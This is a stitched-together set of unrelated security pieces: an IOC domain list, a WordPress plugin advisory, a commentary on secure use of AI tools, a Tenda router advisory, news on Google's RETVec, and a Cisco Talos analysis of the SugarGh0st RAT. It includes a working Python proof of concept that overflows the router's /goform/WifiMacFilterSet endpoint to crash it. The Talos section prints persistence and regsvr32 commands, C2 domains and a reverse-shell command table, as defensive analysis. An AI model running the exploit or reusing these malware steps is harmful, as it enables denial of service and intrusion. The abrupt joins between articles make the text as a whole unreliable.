trk6\[.\]kokamedia\[.\]com  
tracklinker\[.\]space  
trackmenow\[.\]life  
trackify\[.\]world  
trackinghub\[.\]info  
trkmyclk\[.\]xyz  
trk-server\[.\]xyz

34.74.68\[.\]195

**Scam landing pages**

systemmeasures\[.\]life
xyzcreators\[.\]xyz

 Associated Press, ESPN, CBS among top sites serving fake virus alerts 

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users.This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.



**Solution**

 No fix available

 vPatch available

No patched version is available.

Jonas Höbenreich discovered and reported this Sensitive Data Exposure vulnerability in WordPress WP Ultimate Exporter Plugin. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45066: WordPress Export All Posts, Products, Orders, Refunds & Users plugin <= 2.4.1 - Sensitive Data Exposure vulnerability - Patchstack

AI tools can deliver quick and easy results and offer huge business benefits — but they also bring hidden risks.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

Advances in artificial intelligence (AI) and machine learning (ML) technologies continue to receive significant news coverage for the potential benefits and troubling dangers they could unleash. Forecasts like the Nielsen Norman Group estimating that AI tools may improve an employee's productivity by 66% have companies everywhere wanting to leverage these tools immediately. Other experts warn that AI usage could have several negative consequences, including generating inaccurate results, data leaks, and theft. So, how can companies employ these powerful AI/ML tools without compromising their security? Below, we'll touch on the risks AI tools can present and offer eight tips that will help your company leverage these tools as securely as possible.

**The Risks of AI Tools**

In general, AI/ML is simply statistics at scale. All AI models rely on data to statistically generate results for their focus area. Therefore, most risks revolve around said data, especially confidential or sensitive data. Companies using external AI/ML tools risk that the product vendor might use your data to train their algorithms and accidentally leak or steal your intellectual property. Additionally, an AI tool that uses bad data will generate inaccurate results. Fortunately, many AI tools are quite powerful and can be used securely, with a few precautions.

**Tip 1: Remember, if it's free, you are the product.**

If you use a free AI tool or service, you should suspect it may leverage the data you provide. Many early AI services and tools, including ChatGPT, employ a usage model that's similar to social media services like Facebook and TikTok. While you don't pay money to use those sites, you are sharing your private data, which those companies use to target ads and monetize. Similarly, a free AI service can gather data from your devices and keep your prompts, which it uses to train its model. While not seemingly malicious, you never know how an AI service will monetize your data. If that company gets breached, threat actors may obtain access to your data.

**Tip 2: Have legal review agreements.**

To learn how an AI tool or service will handle your data, read the vendor's end-user license agreement, master service agreement, terms and conditions, and privacy policies. These lengthy, complex documents often use tricky language to obscure how the vendor might use your data, so company lawyers should review them. Your legal department knows the regulatory requirements for safeguarding your sensitive data, including personally identifiable information. They can interpret these documents capably and alert you if any terms put your data at risk. A data privacy officer who specializes in the General Data Protection Regulation (GDPR), the California Consumer Privacy Act (CCPA), or any other privacy compliance can also help review these agreements.

**Tip 3: Guard internal data.**

A simple risk of using external AI tools is that an employee — intentionally or not — could share sensitive or confidential data with the tool, exposing the data to misuse. To mitigate this threat, companies must ensure they apply least privilege principles to who can access confidential or sensitive data. Unfortunately, some organizations don't adequately block employees from accessing corporate data that their role doesn't require. If you limit employees to access only the precise data they need, you minimize the amount of data they might divulge to an external AI tool.

**Tip 4: Review settings and consider paying for privacy.**

Whether AI tools or services are free or paid, they often have settings for added privacy. Some tools can be set to not store your prompt data. Review your AI tool's privacy settings and configure them to your preferences. Also, while free tools likely reserve the right to use your data, you can pay licensing fees to get enterprise versions of AI tools that offer more protection. These tools often include features of not using your data and keeping it segmented. 

**Tip 5: Validate the security of AI tool vendors.**

Vendor and supply chain security validation should be a default practice for any new external tool or service partner you adopt. Digital supply chain breaches prove that vendors can become the weakest link in maintaining security. Therefore, third-party risk management (TPRM) products and processes are crucial to information security. A formal TPRM process is vital when using AI tools and service partners.

**Tip 6: Leverage local open source AI frameworks and tools.**

The accessibility of online, external AI tools that are free and user-friendly brings risk. To assure data privacy, consider avoiding external tools. Alternatively, there are free AI frameworks and tools you can deploy and create yourself. These frameworks require more work as well as AI and data science expertise, so they bring their own cost to use.

**Tip 7: Track your company's AI usage.**

It’s difficult to track every asset, software-as-a-service (SaaS) tool, or data store that your employees use, as the cloud and Web services have empowered everyone to use Web-based tools. The same goes for AI-based SaaS offerings. To monitor which external AI tools your employees utilize, how, and with what data, audit and document AI usage as part of the buying process. In identifying all the internal and external AI tools used, you better understand the risks you face. 

**Tip 8: Create an AI policy and raise risk awareness.**

In security, everything starts with policy. The risks your company faces depend on your specific organization's missions and needs, and the data you use. Companies that traffic in public data may face a low data-sharing risk and allow a permissive AI policy, while those that deal in confidential matters will have stringent rules around data use in external AI tools. Ultimately, you must craft an AI policy that's tailored to your company's needs. Once you have that policy, communicate it and the risks associated with AI tools with your employees regularly.

AI tools can deliver quick and easy results and offer huge business benefits while also bringing hidden risks. Fortunately, you can leverage AI tools securely by adopting a few precautions and be on your way to realizing the benefits these tools promise.

**About the Author(s)**

Chief Security Officer, WatchGuard Technologies

Corey Nachreiner is the chief security officer (CSO) of WatchGuard Technologies. Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard's technology and security vision and direction. He has operated at the frontline of cybersecurity for 25 years, evaluating and making accurate predictions about information security trends. As an authority on network security and an internationally quoted commentator, Nachreiner's expertise and ability to dissect complex security topics make him a sought-after speaker at forums such as Gartner, Infosec, and RSA. He is also a regular contributor to leading publications including CNET, Dark Reading, Forbes, Help Net Security, and more. Find him on www.secplicity.org.

8 Tips on Leveraging AI Tools Without Compromising Security

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/WifiMacFilterSet.

**Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information**

Manufacturer's address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

**Affected Version****Vulnerability Details**

Vulnerability Location: /goform/WifiMacFilterSet

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers.

The pages of the router

**POC**

import requests
from pwn import\*

ip \= "192.168.182.21" 
url \= "http://" + ip + "/goform/WifiMacFilterSet"
print(url)

payload \=b'a'\*0x3000

cookie \= {"Cookie":"user="}
data \= {"index": payload,"wl\_radio":0}
response \= requests.post(url, cookies\=cookie, data\=data)
print(response.text)
print("HackAttackSuccess!")

CVE-2023-48964: GitHub - daodaoshao/vul_tenda_i6_2

Google has revealed a new multilingual text vectorizer called RETVec (short for Resilient and Efficient Text Vectorizer) to help detect potentially harmful content such as spam and malicious emails in Gmail.
"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more," according to the project's

Machine Learning / Email Security

Google has revealed a new multilingual text vectorizer called **RETVec** (short for Resilient and Efficient Text Vectorizer) to help detect potentially harmful content such as spam and malicious emails in Gmail.

"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more," according to the project's description on GitHub.

"The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently."

While huge platforms like Gmail and YouTube rely on text classification models to spot phishing attacks, inappropriate comments, and scams, threat actors are known to devise counter-strategies to bypass these defense measures.

They have been observed resorting to adversarial text manipulations, which range from the use of homoglyphs to keyword stuffing to invisible characters.

RETVec, which works on over 100 languages out-of-the-box, aims to help build more resilient and efficient server-side and on-device text classifiers, while also being more robust and efficient.

Vectorization is a methodology in natural language processing (NLP) to map words or phrases from vocabulary to a corresponding numerical representation in order to perform further analysis, such as sentiment analysis, text classification, and named entity recognition.

"Due to its novel architecture, RETVec works out-of-the-box on every language and all UTF-8 characters without the need for text preprocessing, making it the ideal candidate for on-device, web, and large-scale text classification deployments," Google's Elie Bursztein and Marina Zhang noted.

The tech giant said the integration of the vectorizer to Gmail improved the spam detection rate over the baseline by 38% and reduced the false positive rate by 19.4%. It also lowered the Tensor Processing Unit (TPU) usage of the model by 83%.

"Models trained with RETVec exhibit faster inference speed due to its compact representation. Having smaller models reduces computational costs and decreases latency, which is critical for large-scale applications and on-device models," Bursztein and Zhang added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Unveils RETVec - Gmail's New Defense Against Spam and Malicious Emails

Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.”

*   Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” 
*   We found evidence suggesting the threat actor is targeting the Uzbekistan Ministry of Foreign Affairs and users in South Korea. 
*   We assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code.
*   We observed two infection chains leveraging Windows Shortcut embedded with malicious JavaScript to deliver the components to drop and launch the SugarGh0st payload.
*   In one infection chain, the actor leverages the DynamixWrapperX tool to enable Windows API function calls in malicious JavaScript for running the shellcode.
*   Talos assesses with low confidence that a Chinese-speaking threat actor is operating this campaign based on the artifacts we found in the attack samples.

**Suspected Chinese Actor targeting Uzbekistan and South Korea**

Talos discovered four samples deployed in this campaign that are likely targeting users in Uzbekistan and South Korea based on the language of the decoy documents, the lure content, and distribution indicators Talos found in the wild. 

One of the samples is sent to users in the Ministry of Foreign Affairs of Uzbekistan. The sample is an archive embedded with a Windows ShortCut LNK file which, upon opening, drops the decoy document “Investment project details.docx'' with Uzbek content about a presidential decree in Uzbekistan focused on enhancing state administration in technical regulation. The lure content of the decoy document was published in multiple Uzbekistan sources in 2021. The initial vector of the campaign is likely a phishing email with an attached malicious RAR archive file sent to an employee of the Ministry of Foreign Affairs.  

Decoy document in Uzbek language.

Besides Uzbekistan, we also observed indications of targets in South Korea. We found three other decoy documents written in Korean dropped by the malicious JavaScript file embedded in the Windows Shortcut, seemingly distributed in South Korea. The decoy document named “Account.pdf” was forged as a Microsoft account security notification for confirming an account registration with a generated password. Another decoy named “MakerDAO MKR approaches highest since August.docx'' uses the copied content from 코인데스크코리아 (CoinDesk Korea, a Korean news outlet that covers the blockchain). The third decoy document, named “Equipment\_Repair\_Guide.docx,” has the lure information with instructions for computer maintenance in an organization. To reinforce our assessment of South Korean targets, we also observed C2 domain requests from IPs originating from South Korea. 

The decoy documents found in the samples collected by Talos.

During our analysis, we observed a couple of artifacts that suggested the actor might be Chinese-speaking. Two of the decoy files we found have the “last modified by” names shown as “浅唱丶低吟” (Sing lightly, croon) and “琴玖辞” (seems to be the name of a Chinese novel author), which are both Simplified Chinese. 

The author and last editor’s information on decoy documents.

Besides the decoy document metadata, the actor prefers using SugarGh0st, a Gh0st RAT variant. The Gh0st RAT malware is a mainstay in the Chinese threat actors’ arsenal and has been active since at least 2008. Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad. 

**SugarGh0st is a new Gh0st RAT variant**

Talos discovered a RAT that we call SugarGh0st delivered as a payload in this campaign. Talos assesses with high confidence that SugarGh0st is a customized variant of the Gh0st RAT. Gh0st RAT was developed by a Chinese group called 红狼小组 (C.Rufus Security Team), and its source code was publicly released in 2008. The public release of the source code has made it easy for threat actors to get access to it and tailor it to fulfill their malicious intentions. There are several variants of Gh0st RAT in the threat landscape, and it remains a preferred tool for many Chinese-speaking actors, allowing them to conduct surveillance and espionage attacks.

Compared with the original Gh0st malware, SugarGh0st is equipped with some customized features in its reconnaissance capability in looking for specific Open Database Connectivity (ODBC) registry keys, loading library files with specific file extensions and function name, customized commands to facilitate the remote administration tasks directed by the C2, and to evade earlier detections. The C2 communication protocol is also modified. The first eight bytes of the network packet header are reserved as magic bytes versus the first five in the earlier Gh0st RAT variants. The remaining features, including taking full remote control of the infected machine, providing real-time and offline keylogging, hooks to the webcam of an infected machine, and downloading and running other arbitrary binaries on the infected host are aligned with the features of earlier Gh0st RAT variants. 

**A multi-stage infection chain **

Talos discovered two different infection chains employed by the threat actor to target the victims in this campaign. One of the infection chains decrypts and executes the SugarGh0st RAT payload, the customized variant of the Gh0st RAT. Another infection chain leverages the DynamicWrapperX loader to inject and run the shellcode that decrypts and executes SugarGh0st. 

**Infection Chain No. 1**

The first infection chain starts with a malicious RAR file containing a Windows Shortcut file with a double extension. When a victim opens the shortcut file, it runs a command to drop and execute an embedded JavaScript file. The JavaScript eventually drops a decoy, an encrypted SugarGh0st payload, DLL loader and batch script. Then, the JavaScript executes the batch script to run the dropped DLL loader by sideloading it with a copied rundll32. The DLL loader will decrypt the encrypted SugarGh0st payload in memory and run it reflectively. 

**Shortcut file embedded with malicious JavaScript dropper**

The Windows shortcut file discovered in this attack is embedded with JavaScript and has command line arguments to drop and execute it. Upon the victim opening the LNK file, the command line argument of the LNK file runs to locate and load the JavaScript with the string start of “var onm=” which is the beginning of the JavaScript dropper and drops the JavaScript into the %temp% location. After that, the dropped JavaScript is executed using the living-off-the-land binary (LoLBin) cscript. 

Sample of malicious LNK file.

**JavaScript dropper **

The JavaScript dropper is a heavily obfuscated script embedded with base64 encoded data of the other components of the attack. The JavaScript decodes and drops the embedded files into the %TEMP% folder, including a batch script, a customized DLL loader, an encrypted SugarGh0st payload, and a decoy document. It first opens the decoy document to masquerade as legitimate action, then copies the legitimate rundll32 executable from the “Windows\\SysWow64” folder into the %TEMP% folder. Finally, it executes the batch script loader from the %TEMP% location and runs the customized DLL loader. The JavaScript deleted itself from the file system afterward. 

The JavaScript dropper.

**Batch script loader**

The batch script, in this instance, is named “ctfmon.bat” and has the commands to run the dropped customized DLL loader. When executed, it sideloads the DLL loader with rundll32.exe and executes the function which is DllUnregisterServer, typically used by COM (Component Object Model) DLLs.

The batch script loader.

**DLL Loader decrypts and reflectively loads the SugarGh0st payload**

The customized DLL loader named “MSADOCG.DLL” (name of the DLL associated with Microsoft's ActiveX Data Objects (ADO) technology) is a 32-bit DLL written in C++ and implemented as a COM object component. The loader includes packed code that is unpacked with custom unpacking code. When the DLL is run, it unpacks the code to read the dropped encrypted SugarGh0st payload file named “DPLAY.LIB '' from the %TEMP% location, decrypts it and runs it in the memory. 

Stub code to unpack code.

Function to load the encrypted payload.

**Infection chain No. 2**

Similar to the first infection chain, this attack also starts with a RAR archive file containing a malicious Windows Shortcut file forged as the decoy document. The Windows shortcut file, by executing the embedded commands, drops the JavaScript dropper file into the %TEMP% location and executes it with cscript. The JavaScript in this attack drops a decoy document, a legitimate DynamicWrapperX DLL, and the encrypted SugarGh0st. The JavaScript uses the legitimate DLL to enable running the embedded shellcode for running the SugarGh0st payload. 

**JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st**

The JavaScript used in this infection chain is also heavily obfuscated and is embedded with base64-encoded data of other components of the attack, including a shellcode. When the JavaScript is executed, it drops an encrypted SugarGh0st, a DLL called “libeay32.dll” and the decoy document. The JavaScript opens the decoy document and copies Wscript.exe to the %TEMP% folder as dllhost.exe. It runs the dropped JavaScript again using the dllhost.exe and creates a registry subkey called “CTFMON.exe” in the Run registry key to establish persistence. 

Registry Key

HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Subkey

CTFMON.exe

Value

“cmd /c start C:\\Users\\user\\AppData\\Local\\Temp\\dllhost.exe C:\\Users\\user\\AppData\\Local\\Temp\\~204158968.js”

The file “libeay32.dll” is a tool called DynamicWrapperX (originally named “dynwrapx.dll”) developed by Yuri Popov. This tool is an ActiveX component that enables Windows API function calls in scripts (JScript, VBScript, etc.). The attacker can use this to run shellcode via the JavaScript dropper. But, they must first run regsvr.exe to install the component. 

C:\\Windows\\system32\\regsvr32 /i /s C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\libeay32.dll

The DynamicWrapperX DLL registers its member functions in the victim’s machine by creating a registry subkey CLSID with the value “89565275-A714-4a43-912E-978B935EDCCC” in Software\\Classes\\DynamicWrapperX registry key. The JavaScript containing the ActiveX components executes the embedded shellcode using the DynamixWrapperX DLL. 

The shellcode has the API hashes and instructions to load and map to the functions necessary for process injection from Kernel32.dll. It also loads two other DLLs, User32.dll and shlwapi.dll. Then, it loads the encrypted SugarGh0st “libeay32.lib” from the %TEMP% location, decrypts it, and reflectively loads it into the memory space allocated in the dllhost.exe process. 

Shellcode that loads and decrypts the encrypted SugarGh0st. 

**Analysis of SugarGh0st   **

The SugarGh0st sample analyzed by Cisco Talos is a 32-bit dynamic link library in C++ compiled on Aug. 23, 2023. During its initial execution, SugarGh0st creates a mutex on the victim’s machine using the hard-coded C2 domain as an infection marker and starts the keylogging function. The keylogger module creates a folder “WinRAR'' in the location %Program Files% and writes the keylogger file “WinLog.txt.” 

The Keylogging function of SugarGh0st.

SugarGh0st uses “WSAStartup” functions, a hardcoded C2 domain and port to establish the connection to the C2 server. Talos discovered two C2 domains, login\[.\]drive-google-com\[.\]tk and account\[.\]drive-google-com\[.\]tk, used by the threat actor in this campaign.

The C2 communication function of SugarGh0st.

After launching, SugarGh0st attempts to establish the connection to C2 every 10 seconds. If successful, the first outgoing packet always consists of the same eight bytes “0x000011A40100” as a heartbeat. After the heartbeat is successfully sent, SugarGh0st sends the buffer data, which includes the following:

*   Computer name
*   Operating system version 
*   Root and other drive information of victim machine
*   Registry key “HKEY\_LOCAL\_MACHINE\\Software\\ODBC\\H” if exist
*   Campaign codes 1 (Month and Year) and code 2 (in our samples are “default”)
*   Windows version number
*   Root drive’s volume serial number

A sample packet that was sent by SugarGh0st to C2.

SugarGh0st is a fully functional backdoor that can execute most remote control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell.

The Reverse shell function.

SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. 

It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services.

Function to operate services.

SugarGh0st can take screenshots of the victim machine’s current desktop and switch to multiple windows. It can access the victim’s machine camera to capture the screen and compress the captured data before sending it to the C2 server. SugarGh0st can perform various file operations, including searching, copying, moving and deleting the files on the victim’s machine.

It also clears the machine’s Application, Security and System event logs to hide the malicious operations logged to evade detection. 

Function to clean event logs.

SugarGh0st performs the remote control functionalities, including those discussed earlier, as directed by the C2 server with the four-byte hex commands and accompanying data. 

**Command**

**Action**

0x20000001

Adjust process privilege to “SeShutdownPrivilege” and force shut down the host.

0x20000002

Adjust process privilege to “SeShutdownPrivilege” and force reboot the host.

0x20000003

Adjust process privilege to “SeShutdownPrivilege” and force terminate the processes.

0x20000004

Clear event log

0x20000005

Create register key HKEY\_LOCAL\_MACHINE\\Software\\ODBC\\H

0x20000011

Press a key in the default window 

0x20000012

Release a key in the default window 

0x20000013

Set mouse cursor position

0x20000014

Click mouse left button

0x20000015

Release mouse left button

0x20000016

Double click the mouse left button

0x20000017

Click mouse right button

0x20000018

Release mouse right button

0x20000019

Double click the mouse left button

0x21000002

Get the logical drive information of the victim's machine. 

  

0x21000003

Search files on the victims machine filesystem

0x21000004

Delete files on the victim's machine file system

0x21000005

Moves files to the %TEMP% location 

0x21000006

Runs arbitrary shell commands

0x21000007

Copies files on the victim machine 

0x21000008

Move files on the victim's machine

0x21000009

Sends files to the C2 server 

0x2100000A

Sends the data to the windows socket

0x2100000B

Receives files from the C2 server

0x22000001

Sends the screenshot to the C2 server

0x24000001

Read file %ProgramFiles%/WinRAR/~temp.dat (which is encoded with XOR 0x62)

0x24000002

Delete file %ProgramFiles%/WinRAR/~temp.dat

0x23000000

Provides the reverse shell access to the C2 server 

0x25000000

Gets the process information and terminates the process 

0x25000001

Enumerate process information

0x25000002

Terminate Process

0x25000003

Access the victims machine service manager 

0x25000004

Access the configuration files of the running services

0x25000005

Starting service

0x25000006

Terminating and deleting the services. 

0x25000010

Performs the Windows operations

0x25000011

Get window list

0x25000012

Get message from Window

0x28000000

Capture window and perform a series of Window operations based on the command with SendMessage API.

0x28000002

Find a . OLE file under “%PROGRAMFILES%\\\\Common Files\\\\DESIGNER'' and launch

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat is 62647.

ClamAV detections available for this threat:

Win.Trojan.SugarGh0stRAT-10014937-0

Win.Tool.DynamicWrapperX-10014938-0

Txt.Loader.SugarGh0st\_Bat-10014939-0

Win.Trojan.SugarGh0stRAT-10014940-0

Lnk.Dropper.SugarGh0stRAT-10014941-0

Js.Trojan.SugarGh0stRAT-10014942-1

Win.Loader.Ramnit-10014943-1

Win.Backdoor.SugarGh0stRAT-10014944-0

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries related to this threat, please follow the links:

*   SugarGh0st RAT file detected
*   SugarGh0st RAT Registry key 

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

Tag

#mac